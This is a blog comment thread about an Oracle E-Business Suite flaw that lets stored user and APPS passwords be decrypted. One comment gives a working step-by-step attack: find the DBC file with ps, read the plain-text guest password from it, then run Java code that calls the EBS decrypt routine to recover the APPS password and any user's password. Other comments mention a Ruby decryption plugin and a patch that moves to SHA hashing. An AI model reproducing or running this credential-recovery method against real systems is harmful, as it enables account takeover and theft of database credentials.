Comments on: Oracle E-Business Suite Vulnerability: Users Passwords Decrypted

By: Sofia

Sofia — Fri, 08 Feb 2008 16:30:14 +0000

Hi braj
can you give a link of the final exxecutable that you mentioned?
Thank you

By: braj

braj — Fri, 14 Dec 2007 09:21:30 +0000

Hi! Ewad,

If i am normal os user on system and have select any table privilege or select privilege on fnd_user table. I can easily break all the passwords even if i donot know the installation directory of oracle apps.

1. First step is to get guest user password

do the ps and try to find Ddbcfile
ps -eaf|grep Ddbcfile
from there you can get the FND_TOP location and DBCFILE location. The DBC file readable by all and there is plain text entry for guest user password.

2. Now you can easily set the classpath as you the APPL_TOP location and OAH_TOP location from ps command above
/usr/local/j2sdk1.4.2_15/jre/lib/rt.jar:/usr/local/j2sdk1.4.2_15/lib/dt.jar:/usr/local/j2sdk1.4.2_15/lib/tools.jar:/usr/local/j2sdk1.4.2_15/jre/lib/charsets.jar:/usr02/app/applebid/admin/ebid/java/appsborg2.zip::/usr02/app/applebid/product/8.0.6/forms60/java:/usr02/app/applebid/admin/ebid/java:/export/home/applebt1

3. Now write a simple Java code

public class GetPassword {
public static void main(String[] args) {

String appspassword=new String();
String guest_pwd=new String();
String userpass=new String();
String encrypted_foundation_passsword=new String();
String encrypted_passsword=new String();

guest_pwd=”GUEST/ORACE”; /* fvalue got from dbc file */
encrypted_foundation_passsword=”fafasfafafaf”; /* value got from fnd_user table for GUEST user */
encrypted_passsword=”rfsfsfsafsfsfsf”; /* value got from fnd_user table for given user */
appspassword= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(guest_pwd, encrypted_foundation_passsword);
userpass= oracle.apps.fnd.security.WebSessionManagerProc.decrypt(appspassword,encrypted_passsword);
System.out.println(”user password:”+userpass);
System.out.println(” apps password:”+appspassword);
}

}

4. compile and run and you will get the user and apps password.

By: Raimonds

Raimonds — Tue, 30 Oct 2007 22:47:44 +0000

I had a look on the new modified Java class oracle.apps.fnd.security.AolSecurity that this patch delivers.

As Oracle has written in the patch description now user passwords are stored in the following way:
1) at first SHA digest is made from user password
2) and then SHA digest is encrypted with APPS password and stored in encrypted_user_password column

When password verification is done then
1) encrypted_user_password is decrypted with APPS password
2) SHA1 of user password is compared with decrypted result

So it means that it will not be possible to find out all user passwords using APPS password as decryption key.

But as it seems to me if you will have SQL access to the database and if you will have at least one EBS login and password for this database then you will still be able to get APPS password.

By: bsieberth

bsieberth — Tue, 30 Oct 2007 18:03:51 +0000

It looks like there may be a fix for this vulnerability. Note: 457166.1 talks about a new option for FNDCPASS available in 11.5.10 RUP 6 and 12.0.4 to migrate user to a non-reversible hash password scheme. I haven’t tried it yet to verify it, but it sounds like doing that will close off this vulnerability

-Brian

By: Raimonds

Raimonds — Tue, 30 Oct 2007 17:52:07 +0000

Using Mehmet’s Java source as an example I have created
Oracle E-Business Suite authentication plugin in Ruby. You can use this plugin for Ruby on Rails applications that want to use Oracle EBS users and passwords for authentication. Or you can use this as an example how to decrypt Oracle EBS user passwords in Ruby

By: Nilesh

Nilesh — Mon, 17 Sep 2007 23:59:40 +0000

Mehmet, How do you get the apps password through a user account? I have a need for a custom application, the users need to login using Oracle e-business password and then I need the apps database password to start the session just like Discoverer. Any pointers on this one, would greatly appreciate.

Thanks Nilesh

By: Eddie Awad

Eddie Awad — Mon, 23 Jul 2007 18:55:10 +0000

zokho, Here is the documentation for Data Encryption Using DBMS_OBFUSCATION_TOOLKIT in 9i.

You may also want to visit forums.oracle.com and ask your questions there. Usually, you will get a faster response there.

By: zokho

zokho — Wed, 18 Jul 2007 12:41:19 +0000

hello eddie
i have an oracle 9i and one of my assignment in university is that how to decrypt users’ password in oracle so i ve read several guides related to topic and i found that i should have a table in my oracle which is named fnd_user!!!
is there any other approach to decrypt passwords in oracle 9i?
thank u
best regards

By: Eddie Awad

Eddie Awad — Wed, 18 Jul 2007 03:26:21 +0000

Zokho, this is related to the Oracle E-Business Suite (EBS). If you do not have EBS, this does not apply to you.

By: zokho

zokho — Tue, 17 Jul 2007 11:17:32 +0000

hi again
im using oracle 9i.
i cant find any appsys schema in my oracle to have access to fnd_user and fnd_web_sec package!!
in which oracle version i can have have appsys schema???
or are there any table like fnd_user and package fnd_web_sec in oracle 9i?